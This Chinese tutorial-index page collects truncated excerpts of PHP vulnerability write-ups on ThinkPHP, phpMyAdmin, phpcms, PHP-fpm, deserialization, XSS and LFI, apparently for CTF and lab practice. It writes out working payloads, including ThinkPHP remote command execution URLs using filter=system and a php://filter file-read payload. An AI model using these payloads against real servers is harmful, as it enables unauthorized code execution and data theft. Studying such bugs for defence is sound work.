【web上存漏洞及原理分析、防范方法_PHP教程】教程文章相关的互联网学习教程文章

Natas26 Writeup(PHP反序列化漏洞)【代码】【图】

Natas26:打开页面是一个输入坐标点进行绘图的页面。 <html> <head> <!-- This stuff in the header has nothing to do with the level --> <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css"> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" /> <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" /> <scrip...

ThinkPHP 5.1.x远程命令执行漏洞利用, 参考POC【图】

thinkphp5.1.1为例 1、代码执行:http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2、命令执行:http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=system&data=dir   各个版本的执行方式各不相同, 未测试的一些POC:1. /index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2. /index.php?s=index/\think\Request/input&filter=sys...

PHP反序列化漏洞【代码】

疫情严重,在家也要保持学习 先简单介绍一下序列化和反序列化。 序列化与反序列化 序列化是指将对象的状态信息转换为存储和传输的形式的过程。 在PHP中,其指的是将变量和对象转换为某种制式字符串的形式,主要用到的是下面两个函数。 Serialize和Unserialize函数 现有一个类: class YGDX{public $pub = 'pubstr';private $pri = 'pristr';protected $pro = 'prostr'; } //对其进行序列化 $obj= new YGDX(); $obj_se = serialize(...

【漏洞练习-Day17】php中 md5(xxx,true)引发的漏洞【代码】【图】

开始练习【红日团队】的PHP-Audit-Labs 代码审计 Day17 链接:https://github.com/hongriSec/PHP-Audit-Labs 感兴趣的同学可以去练习练习 预备知识: 内容题目均来自 PHP SECURITY CALENDAR 2017 Day 17 - Mistletoe代码如下: class RealSecureLoginManager {private $em;private $user;private $password;public function __construct($user, $password) {$this->em = DoctrineManager::getEntityManager();$this->user = $user...

PHP反序列化漏洞【代码】【图】

前言 这几天一直在关注新管状病毒,从微博到各大公众号朋友圈了解感觉挺严重的看微博感觉特别严重看官方说法感觉还行那就取中间的吧 自己要会对这个东西要有理性的判断。关注了好两天所以耽搁了学习emmm 希望病毒早点过去吧!反序列化漏洞 序列化和反序列化 为了有效地存储或传递数据,同时不丢失其类型和结构,经常需要利用序列化和反序列化函数对数据进行处理。 反序列化函数返回字符串,此字符串包含了表示值的字节流,可以存储...

[漏洞复现]thinkphp3.2_find_select_delete【代码】【图】

个人博客地址 http://www.darkerbox.com欢迎大家学习交流 参考网址: https://xz.aliyun.com/t/2629#toc-3环境: 链接:https://pan.baidu.com/s/1DyHy1Z-IPhPFzQC_mEIZeQ 提取码:8vxn 漏洞概述 如何搭建环境我就不细说了,可以参照参考网址里的步骤搭建。 还需要phpstorm配合xdebug调试,网上教程很多,不多介绍了。 漏洞利用 搭建好环境后,直接上payload,测试是否正常。我本地搭建到了8083端口 http://127.0.0.1:8083/index....

应用安全 - PHP - CMS - EmpireCMS - 漏洞 - 汇总

2006 Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability Empire CMS Checklevel.PHP远程文件包含漏洞 2009 Empire CMS 47 SQL Injection 2014 Empire Empire CMS Solar Empire 2018 empire(帝国)CMS 最新版(v7.5)一处后台getshell 2019 Empire cms安装处任意文件读取

ThinkPHP v6.0.x 反序列化漏洞利用【代码】【图】

前言: 上次做了成信大的安询杯第二届CTF比赛,遇到一个tp6的题,给了源码,目的是让通过pop链审计出反序列化漏洞。 这里总结一下tp6的反序列化漏洞的利用。 0x01环境搭建 现在tp新版本的官网不开源了,但是可以用composer构建环境,系统需先安装composer。然后执行命令:composer create-project topthink/think=6.0.x-dev v6.0 cd v6.0php think run或者可以去github上下载,但是需要改动很多,也可以去csdn上下载人家配好了的源...

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现【代码】【图】

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现参考文章1 参考文章2 By:Mirror王宇阳漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞。该漏洞来自一部分代码,其中页面在phpMyAdmin中被重定向和加载,以及对白名单页面进行不正确的测试。 攻击者必须经过身份验证,但在这些情况下除外:$ cfg [‘AllowArbitraryServer’] = true:攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码...

PHP multipart/form-data 远程DOS漏洞

import sys import urllib,urllib2 import datetime from optparse import OptionParser def http_proxy(proxy_url):proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})null_proxy_handler = urllib2.ProxyHandler({})opener = urllib2.build_opener(proxy_handler)urllib2.install_opener(opener) #end http_proxy def check_php_multipartform_dos(url,post_body,headers):req = urllib2.Request(url)for key in heade...

PHP脚本中的XSS漏洞【代码】

我一直在到处搜索以尝试找到解决方案.我最近一直在我们的网站上运行扫描,以查找XSS和SQL注入的任何漏洞.一些项目引起了我的注意. 现在,使用filter_var()验证并清除用户输入的任何数据. 现在,我的问题是XSS和操纵URL的人员.似乎无处不在的简单方法是:http://www.domainname.com/script.php/">< script>alert('xss');< /script >然后,这将更改某些$_SERVER变量,并导致我到CSS,链接,图像等的所有相对路径都无效,并且页面无法正确加载...

2019-11-14:ThinkPHP 2.x 任意代码执行漏洞,复现【图】

*文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace(@(\w+).$depr.([^.$depr.\/]+)@e, $var[\\\1\]="\\2";, implode($depr,$paths)); 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。 ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。 一、环境搭建...

bugku-flag在index里(本地文件包含漏洞+php伪协议的结合应用)【图】

首先页面点击click me之后就显示这样 根据file=show.php可以想到本地文件包含漏洞 所以直接 http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php 可以得到 从密文最后的“==”可以知道是base64密文,将密文解密之后可以得到 得到flag。 现在我们来总结一下上面 ?file=php://filter/read=convert.base64-encode/resource=index.php 的含义 ?file是一个get参数传...

2019-11-9:phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)【图】

一,下载安装phpcmsv966.0 1,下载官方下载phpcms v9.6.0版本,下载地址: http://download.phpcms.cn/v9/9.6/下载之后,将源码都解压到phpstudy的www目录,浏览器访问源码中的install目录,一步步安装 2,打开后台管理,进入后台,后台账号密码为之前安装时候设置的账号密码 二、漏洞复现 1,查询资料可知,任意文件上传漏洞出现在,PHPCMS 9.6.0版本中的libs/classes/attachment.class.php文件存在漏洞,该漏洞源于PHPCMS程序在下...

PHP-fpm 远程代码执行漏洞(CVE-2019-11043)源码分析【代码】

一、漏洞复现 1、搭建docker环境(yum install docker-re) 2、拉取镜像配置docker-compose.yml文件,并拉取镜像 docker-compose up -dversion: 2 services:nginx:image: nginx:1volumes:- ./www:/usr/share/nginx/html- ./default.conf:/etc/nginx/conf.d/default.confdepends_on:- phpports:- "8080:80"php:image: php:7.1.32-fpmvolumes:- ./www:/var/www/htmldefault.confserver {listen 80 default_server;listen [::]:80 def...